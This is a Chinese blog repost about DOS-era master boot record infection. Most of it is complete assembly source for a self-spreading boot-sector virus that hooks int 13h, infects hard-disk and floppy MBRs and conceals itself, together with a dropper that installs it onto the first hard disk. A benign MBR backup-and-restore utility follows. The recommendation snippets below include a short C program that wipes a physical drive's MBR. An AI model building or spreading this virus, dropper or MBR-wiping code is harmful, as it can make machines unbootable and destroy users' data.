[1.1]MBR感染

最新推荐文章于 2021-06-22 17:09:41 发布
最新推荐文章于 2021-06-22 17:09:41 发布
阅读量146 收藏
点赞数
文章标签: 操作系统
原文链接:http://www.cnblogs.com/Tbit/archive/2010/10/30/1865139.html
版权

  MBR感染,是DOS时代的事情了..那个时代的Dos机需要一个1.44MB大小的软盘来作为启动盘,于是MBR病毒就会大肆的感染

MBR区,也感染了软盘的MBR...呵呵..现在的windows不需要通过软盘来启动了..但是现在的MBR感染应该不叫MBR感染了..

叫改写了MBR区..windows下对MBR改写的可以参考下charme同学的<<MBR另类感染技术>>.

下面贴一段dos时代的mbr病毒,注意hook int 13h...

 

;example.asm

;===================================================================
;
; compile it with : tasm /m example.asm | tlink /x example.obj
;        exe2bin example.exe
; and then use the dropper program located at the end of the virus
;
;===================================================================

.286
.model tiny
.code
 org 0
 
begin:
 jmp short install_virus   ;跳转到真正的病毒体(2字节)
 db 3ch dup (0)      ;buffer used for saving the floppy stuph

install_virus:
 xor ax,ax
 cli
 mov ss,ax
 mov sp,7c00h
 sti
;decrease the TOM with 1kb
 mov ds,ax
 dec WORD ptr ds:[413h]
 mov ax,WORD ptr ds:[413h] ;get the new value (should be = 639kb)
;替病毒寻找一个新的segment,并将病毒复制到该segment
 mov cl,6
 shl ax,cl       ;convert from kb to paragraphs
 mov es,ax       ;ES is now equal to the new segment
 mov si,7c00h      ;DS:SI = 0:7C00H(病毒的开始地址)
 xor di,di       ;ES:DI = ES:0
 mov cx,256
 cld 
 rep movsw       ;复制CX*2字节数,从DS:SI到ES:DI
 
 push es
 lea ax,[inmemory]    ;save the offset where to jump
 push ax
 retf         ;jump to our virus in memory
inmemory:
 mov ax,WORD ptr ds:[13h*4] ;获得原始的 int 13h的入口地址
 mov WORD ptr cs:[old_13h],ax;并将该地址保存在变量old_13h中
 mov ax,WORD ptr ds:[13h*4+2]
 mov WORD ptr cs:[old_13h+2],ax
 
 mov WORD ptr ds:[13h*4+2],es;set the segment
 lea ax,myint13h
 mov WORD ptr ds:[13h*4],ax ;设置新的中断处理程序,指向myint13h
 
 int 19h       ;int 19h 重启.
           ;并将硬盘主引导扇区读到0000:7C00(OS的加载指令),
           ;再转到该处执行,进一步引导OS
myint13h:
 cmp dh,0       ;检查是否为 head 0
 jne exit_handler    
 cmp cx,1       ;检查是否为sector 1 和 track 0
 jne exit_handler
 cmp ah,2       ;read from sector 1?
 jne exit_handler
 call int13       ;伪造个一个int13,参见下面代码
 jnc read_call     ;if no error,jump to our code
 
exit_handler:
 db 0eah        ;跳转到 原始的 int13h
 old_13h dd ?

read_call:
 pushf
 pusha
 push ds es
 
 cmp WORD ptr es:[bx+offset vmark],'DV';检查感染标志
 je  stealth
 
 push cs cs
 pop ds es       ;DS=ES=CS
 
 mov bx,512      ;put it in CS:512
 mov ax,201h      ;read one sector
 call int13
 
 mov cx,3ch      ;复制3ch字节数
 mov si,514      ;从 CS:514
 mov di,2       ;到 CS:2
 cld     
 rep movsb       ;mov from DS:SI to ES:DI
 
 call choose_sector   
 mov ax,301h      ;write the original MBR/BS
 call int13       ;write it to disk
;将病毒写入主引导扇区 
 xor bx,bx       ;from CS:0
 xor dh,dh       ;to head 0
 mov cx,1       ;track 0, sector 1
 mov ax,301h      ;write our virus
 call int13
 jmp short exit
 
stealth:
 mov ax,201h      ;read the original MBR/BS in memory
 call choose_sector
 call int13

exit:
 pop es ds
 popa 
 popf
 retf
;将硬盘的MBR保存在sector 2,软盘的MBR保存在sector 14 
choose_sector:
 mov cx,2
 cmp dl,79h
 ja  hard_disk
 mov dh,1
 mov cx,14
hard_disk:
 ret
 
int13:
 pushf
 call DWORD ptr cs:[old_13h]
 ret
 
vmark db 'VDamon'      ;病毒感染标志
 org 1feh       ;1feh=510=(512-word)
 db 055h,0aah      ;boot signature
end begin
 

;dropper.asm

;  ----------- cut here -----------

;  And here goes a little dropper for the virus...
;  ----------- cut here -----------
; tasm dropper.asm | tlink /x /t dropper.obj
;
.model tiny
.code
   org 100h
start:
;read the original MBR in memory
   mov ax,201h
   mov dx,80h
   mov cx,1
   push cs
   pop es
   lea bx,after_end
   int 13h
;write the original MBR to disk (0,0,2)
   mov dx,80h
   mov cx,2
   mov ax,301h
   lea bx,after_end
   int 13h
;read the virus from file
   mov ax,3d00h
   lea dx,virus_sample
   int 21h
   xchg bx,ax
   mov ah,3fh
   lea dx,after_end
   mov cx,512
   int 21h
   mov ah,3eh
   int 21h
;write the virus to disk (0,0,1)
   mov dx,80h
   mov ax,301h
   lea bx,after_end
   mov cx,1
   int 13h
;exit to operating system
   mov ax,4c00h
   int 21h
virus_sample db 'example.bin',0
after_end:
end start

 

;saving and restoring MBR

--< cut here >--
.286
.model tiny
.code
   org 100h
start:
   mov ah,62h                           ;get the current PSP address
   int 21h
   mov es,bx                            ;ES=seg of PSP for current process
   mov al,byte ptr es:82h               ;point to the DOS command line
   cmp al,'0'                           ;if 1st param='0' then save everything
   je read_save_all
   cmp al,'1'                           ;else, restore everything
   je write_restore_all

   push cs                              ;if no param entered, display err msg
   pop ds
   mov ah,9
   lea dx,params
   int 21h
exit:
   mov ax,4c00h                         ;and exit...
   int 21h

read_save_all:
   push cs cs
   pop ds es                            ;es=ds=cs

   mov ah,3ch                           ;create a new file
   xor cx,cx                            ;normal file even
   lea dx,filename                      ;'bootpart.cap' is its name :)
   int 21h
   jnc r_continue
r_error:
   mov ah,9                             ;error creating 'bootpart.cap'
   lea dx,createrr
   int 21h
   jmp exit
r_continue:
   xchg bx,ax                           ;handle in BX

   mov dh,0                             ;read the Master Boot Record of 1st HDD
   call readsector

   mov ah,40h                           ;write it to our file
   lea dx,buffer
   mov cx,512
   int 21h
   jc r_error                           ;if error, exit

   mov dh,1                             ;read the Boot Sector of 1st HDD
   call readsector

   mov ah,40h                           ;write it to our file
   lea dx,buffer
   mov cx,512
   int 21h
   jc r_error                           ;if error, exit

   mov ah,3eh                           ;close the file
   int 21h
   jmp exit

write_restore_all:
   push cs cs
   pop ds es                            ;es=ds=cs

   mov ax,3d00h                         ;open
   lea dx,filename                      ;'bootpart.cap'
   int 21h                              ;NOW! :)
   jnc w_continue
w_error:
   mov ah,9
   lea dx,readerr                       ;error reading BOOTPART.CAP file
   int 21h
   jmp exit
w_continue:
   xchg bx,ax                           ;handle in BX

   mov ah,3fh                           ;read the MBR from file in memory
   lea dx,buffer
   mov cx,512
   int 21h
   jc w_error

   mov dh,0                             ;write the MBR
   call writesector

   mov ah,3fh                           ;read the BS from file in memory
   lea dx,buffer
   mov cx,512
   int 21h
   jc w_error

   mov dh,1                             ;write the BS
   call writesector

   mov ah,3eh                           ;close the file
   int 21h
   jmp exit

readsector:
;input: head number in DH
;output: buffer filled up with the read sector
  pusha                                 ;save all registers
  mov ah,2                              ;subfunction 02h=read sectors
  mov dl,80h                            ;80h=first hard disk
  xor ch,ch                             ;track (cylinder) number
  mov cl,1                              ;sector number
  mov al,1                              ;sector count
  lea bx,buffer                         ;address of our buffer
  int 13h
  popa                                  ;restore all registers
  ret

writesector:
;input: head number in DH
;       buffer filled up with the sector you want to write
;output: nothing
  pusha                                 ;save all registers
  mov ah,3                              ;subfunction 03h=write sectors
  mov dl,80h                            ;80h=first hard disk
  xor ch,ch                             ;track (cylinder) number
  mov cl,1                              ;sector number
  mov al,1                              ;sector count
  lea bx,buffer                         ;address of our buffer
  int 13h
  popa                                  ;restore all registers
  ret

createrr db 13,10,'Error creating BOOTPART.CAP!',13,10,'$'
readerr  db 13,10,'Error reading BOOTPART.CAP!',13,10,'$'
params   db 13,10,'MBR/BS backup, coded by Virtual Daemon [SLAM]',13,10
db 'Use: <0> to save the MBR/BS of the 1st HDD to a file (bootpart.cap)',13,10
db '     <1> to restore the previously saved MBR/BS from a file',13,10,'$'
filename db 'bootpart.cap',0
buffer   db 512 dup (?)
end start
--< cut here >--

 

转载于:https://www.cnblogs.com/Tbit/archive/2010/10/30/1865139.html

a519609598
关注
实现任意本地虚拟机或者本地物理机迁移上云到云平台使用,操作系统中的所有应用服务均不丢失正常使用启动,实现V2V、P2V、H2V,结合存储平台或者云平台实现热迁移服务不中断
代码讲故事
07-25 590
实现任意本地虚拟机或者本地物理机迁移上云到云平台使用,操作系统中的所有应用服务均不丢失正常使用启动,实现V2V、P2V、H2V,结合存储平台或者云平台实现热迁移服务不中断。 干过 云计算 平台的都比较清楚,云计算平台对 虚拟机镜像是有一定要求的,主要体现在驱动支持这一块,单纯的说虚拟机文件格式,基本上在虚拟化领域中都有支持的相同格式。以openstack构建的云平台为例,如果是在本地通过 Vmware Workstation 或者 VirtualBox 等虚拟化工具制作的镜像,如何进行迁移上传到云平台?
主引导区MBR病毒解决方案
weixin_33898876的博客
04-05 1671
mbr是硬盘的主引导记录,属于引导区,故可以清除,引导区它记录着一些硬盘最基本的信息,像硬盘的分区信息,这些信息可以保证你的硬盘能正常工作,但如果这些信息被修改了,那硬盘里的数据就会丢失。一般常在网上下载东东或是经常到处乱拷东东的机器最容易患引导区病毒。像CIH病毒就是利用了这一点,破坏了你的硬盘分区,使你的数据丢失。所以引导区的安全问题是相当重要的。 MBR病毒简介: ...
MBR感染学习
D_R_L_T的博客
03-30 578
前几天工程实践,有人涉及到了MBR感染。我也来学习一哈。本文我们要了解的几个东西:    1)什么是MBR。    2)怎么感染MBR 。    3)怎么分析MBR感染。    4)BIOS int 10 中断的应用。    5)怎么预防和修复MBR感染。1.什么是MBR(引用自百度知道)    MBR,全称为Master Boot Record,即硬盘的主引导记录。    为了便于理解,一般将...
MBR样本分析
积累点滴,保持自我
07-06 1688
1  MBR病毒样本分析 1.1  基本信息 样本类型:MBR感染样本 大小:36864 字节 36KB MD5:955b66c722ca993dd11fbe56bbf92525 壳种类:无壳 编译器信息:VC++6.0 简介:该样本是一个修改MBR的病毒。 感染症状:感染该病毒后,刚开始并不会发现有什么异常情况,但是当你重启电脑后,你就会发现电脑启动停留在一个黑色界面,带着恶意文
MBR病毒分析
Youngs-RSR技术专栏
05-04 872
样本行为:1、样本运行后,会直接获取\\.\PhysicalDrive0的句柄,从第1扇区(偏移为0x0)读取大小为200字节的内容写入到第3扇区(偏移为0x400)中。其目的应该在输入正确密码后,重新恢复原有第1扇区的信息。2、往第1扇区(偏移为0x0)中写入大小为200字节的MBR敲诈信息(即重启后的开机界面,需要输入正确的密码才能恢复第1扇区)3、在创建输入密码界面的时候,则会不停的遍历进程
MBR病毒
plucode的专栏
10-14 1825
好久没有治疗电脑了。前天发生的事情,今儿一起分享一下。MBR病毒。 一朋友拿来一笔记本电脑,说是系统开机自检硬盘,要取消掉。确实是,开机就自检硬盘。于是乎,进入bios把它禁用了。但是,问题就来了,重启之后,马上就蓝屏了。还原默认bios设置,一样。还是蓝屏。奇怪乎!!! 于是乎,进入安全模式。悠嘻,不会蓝屏!!! 分区有问题?因为试过【内存条,硬盘,拆掉换掉都不会有问题的。】 只能默默地把
MEMZ1.1引导以及程序源码
07-28
它通常通过MBR感染,这意味着它会修改MBR以确保在系统启动时运行,从而达到持久驻留的目的。理解MEMZ的源码有助于安全研究人员学习如何检测和防御此类攻击。 源码分析可能包括以下几个方面: 1. **感染机制**:研究...
修改硬盘物理内存...............
02-26
5. **硬盘修复工具**:“HDD repair1.1”这样的工具可能具备的功能包括SMART检测(监控硬盘健康状态)、坏道检测与修复、MBR修复(主引导记录)等。使用这类工具前,建议先备份重要数据。 6. **数据恢复**:当数据...
理解和解决系统引导管理器的问题
## 1.1 引导管理器的定义和背景知识 引导管理器(Boot Manager)是计算机系统中负责控制和管理系统引导过程的软件。它位于计算机的启动介质上,如硬盘的主引导记录(MBR)或 EFI(可扩展固件接口)的系统分区。引导管理...
MBR另类感染技术
求索
01-12 3526
MBR另类感染技术
分享一病毒源代码,破坏MBR,危险!!仅供学习参考,勿运行(vc++2010已编译通过)
杨航的专栏
04-28 1万+
我在编译的时候,杀毒软件提示病毒并将其拦截,所以会导致编译不成功。 1>D:\c++工程\windows\windows\MBR病毒.cpp : fatal error C1083: 无法打开编译器中间文件:“C:\Users\lenovo\AppData\Local\Temp\_CL_953b34fein”: Permission denied 1> 1>生成失败。 杀毒软件提示: 检
汇编cmp比较指令详解
weixin_34365635的博客
03-16 2297
汇编cmp比较指令详解 刚刚看到了cmp指令,一开始有点晕。后来上网找了些资料,终于看明白了,为了方便初学者,我就简单写下我的思路吧。高手绕过,谢谢! cmp(compare)指令进行比较两个操作数的大小 ...
汇编语言 CMP指令
热门推荐
꧁༺ʚvv༒catɞ༻꧂的博客
06-22 8万+
CMP(比较)指令执行从目的操作数中减去源操作数的隐含减法操作,并且不修改任何操作数。 指令格式: CMP 目的操作数, 源操作数 标志位 当实际的减法发生时,CMP指令按照计算结果修改溢出、符号、零、进位、辅助进位和奇偶标志位。如果比较的是两个无符号数,则零标志位和进位标志位表示的两个操作数之间的关系如下表所示: CMP结果 ZF CF 目的操作数 < 源操作数 0 1 目的操作数 > 源操作数 0 0 目的操作数 = 源操作数 1 0 如果比较的是两个有符号数,则符号标志位
MBR 病毒分析
Y_KolaFish_Y的博客
04-10 2788
转载自https://bbs.pediy.com/thread-121861.htm Author:Cryin MBR病毒分析 一、基础知识 1、 Windows启动过程 系统引导过程主要由以下几个步骤组成(以硬盘启动为例) 1、 开机; 2、 BIOS加电自检(POST—Power On Self Test),内存地址为0fff:0000; 3、 将硬盘第一个扇区(0头0道1扇区,也就是Boot...
硬盘锁---MBR病毒
liujiayu2的专栏
06-11 5140
unsigned char scode[] = "\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c" "\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72" "\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x
C语言 简单 MBR 病毒 4行代码
Qode
07-08 2824
清除 MBR 使系统无法启动 #include <stdio.h> int main() { FILE *disk = fopen("\\\\.\\PHYSICALDRIVE0", "rb+"); char mbr[512] = {0}; fwrite(mbr, sizeof(mbr), 1, disk); fclose(mbr); return 0; } ...
病毒木马查杀实战第023篇:MBR病毒之引导区的解析
Gleam的专栏
04-18 9990
前言        引导型病毒指寄生在磁盘引导区或主引导区的计算机病毒。这种病毒利用系统引导时,不对主引导区的内容正确与否进行判别的缺点,在引导系统的过程中入侵系统,驻留内存,监视系统运行,伺机传染和破坏。按照引导型病毒在硬盘上的寄生位置又可细分为主引导记录病毒和分区引导记录病毒。我们未来的几次课,会专门从各个角度来分析这种病毒的特点,阐述病毒原理,提出应对方法。而本次课程的内容主要来讨论一下引
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值